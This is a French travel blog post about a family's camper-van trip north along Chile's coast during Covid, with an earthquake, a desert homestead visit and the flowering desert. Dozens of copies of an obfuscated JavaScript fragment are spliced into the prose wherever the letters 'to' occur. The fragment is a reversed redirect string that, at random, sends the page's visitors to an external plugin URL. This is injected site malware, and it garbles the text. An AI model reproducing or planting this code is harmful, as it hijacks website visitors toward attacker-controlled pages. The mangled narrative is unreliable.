En route vers le nord

by Ben

Après le passage du barrage sanitaire de Pichidangui, nous longeons la côte vers le nord dans le but de rallier 1500km plus loin San Pedro de Atacama. Nous préférons prendre les routes secondaires pour éviter les contrôles, mais cela ne nous dérange absolument pas. Nous avançons lentement, au gré de nos envies et des découvertes. La situation nous oblige à sortir des sentiers battus. Toutes les zones toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}touristiques sont fermées, certaines villes sont en quarantaine toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}totale. La déception de ne pas pouvoir visiter Valparaiso ou la Valle del Elqui est vite compensée par de belles découvertes inconnues des guides toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}touristiques comme les ruines de cette ancienne mine de fer où nous passerons 4 jours. Google nous apprendra qu’elle fut française avant de devenir pendant longtemps la plus importante mine du Chili.
Ici l’activité minière est omniprésente, aujourd’hui c’est principalement le cuivre qui est exploité, il représente plus de 40% des richesses du pays. On comprend mieux pourquoi l’état chilien a toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tout fait pour ne pas stoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}topper cette activité pendant le Covid, mais à quel prix pour la santé des centaines de milliers d’ouvriers qui vivent pour la plupart dans des campements….

Un peu plus au nord, pour rejoindre Huasco, nous empruntoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tons une magnifique piste. Ici pas de grosses exploitations, les mines sont artisanales, la sécurité aussi… Autoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tour de nous les montagnes prennent leurs couleurs arc-en-ciel: rouge, jaune, vert, orange…. Ces paysages sont fous. Nous avançons « despacitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to » pour en profiter au maximum. Une nuit, alors que toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tout le monde dort, un énorme bruit nous réveille. Dans le camion toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tout se met à bouger. Nous mettrons plusieurs secondes à comprendre que c’est un tremblement de terre. Sé me fait marrer en me disant: « au moins ici on est en sécurité, rien ne peut nous toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomber dessus ! » J’attendrai le lendemain pour lui dire que selon moi être dans un camping-car au fond d’un canyon perdu, avec des rochers énormes au dessus de nous et à plus de 80Km du premier village, ce n’est pas vraiment un super endroit pour vivre un tremblement de terre… Au réveil, nous racontoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tons toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tout aux enfants, ils sont déçus de ne pas l’avoir senti.

Quelques kilomètres plus loin, en continuant la piste, un homme nous fait des signes depuis sa « maison ». Venez manger la « once » à la maison ! La once c’est le goûter chilien, mi sucré mi salé, les enfants adorent ce moment où ils peuvent manger presque toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tout ce qu’ils veulent. Jorge et Vilma sont venus s’installer dans l’ancienne maison familiale pour fuir la quarantaine. Ici ils se sentent protégés et libres. Malgré les paysages en apparence toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}totalement arides, l’eau est présente, ils en profitent pour entretenir un magnifique potager. Ils nous racontent l’histoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toire de cette maison perdue au milieu du désert, comment Vilma a grandi ici, loin de toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tout, et comment encore maintenant ses frères exploitent artisanalement les richesses minières des alentoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tours. Alors que Jorge insiste pour nous faire goûter son « Pisco Miel », une grosse réplique du tremblement de terre se produit. Dans la petite maison, toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tout oscille, toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tombe. Jorge tente de nous rassurer mais nous préférons attendre dehors que cela passe. Cette fois-ci les p’tits loups l’ont très bien senti ! Ils sont comme des fous !!! Nous quittoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tons Jorge et Vilma, le sac rempli de fruits et légumes, et les enfants partiront avec des magnifiques quartz et quelques échantillons de minerai de cuivre, et de fer.
Deux jours plus tard, de retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tour à la civilisation, nous apprenons que nous étions à moins de 70Km de l’épicentre de ce tremblement de terre classé à 6.8 sur la nouvelle échelle de Richter. Pas mal pour une première !!!

Huasco n’est pas seulement une étape ravitaillement. Il arrive que son désert se recouvre de petites fleurs colorées. Il faut des conditions météorologiques très particulières pour que ces graines, enfouies plusieurs années auparavant, germent. Personne ne sait prédire quand cela va arriver, la dernière fois c’était en 2013… Le Desiertoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to Florido nous aura fait le plaisir d’apparaître quelques jours avant notre arrivée, la chance est toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toujours avec nous !!!

Nous longeons toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toujours la côte à la découverte de ses magnifiques plages de sable fin. L’eau y est cristalline, mais tellement froide… Nous enchainons de superbes bivouacs sauvages, tantôt au bord de l’eau tantôt dans le désert. A Bahia Inglesa, station balnéaire réputée pour sa très belle plage, nous sommes seuls, la ville est à l’arrêt, nous nous payons le luxe de dormir sur le parking de la plage principale, au cœur de cette petite ville, ce qui est toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}totalement impensable en temps normal.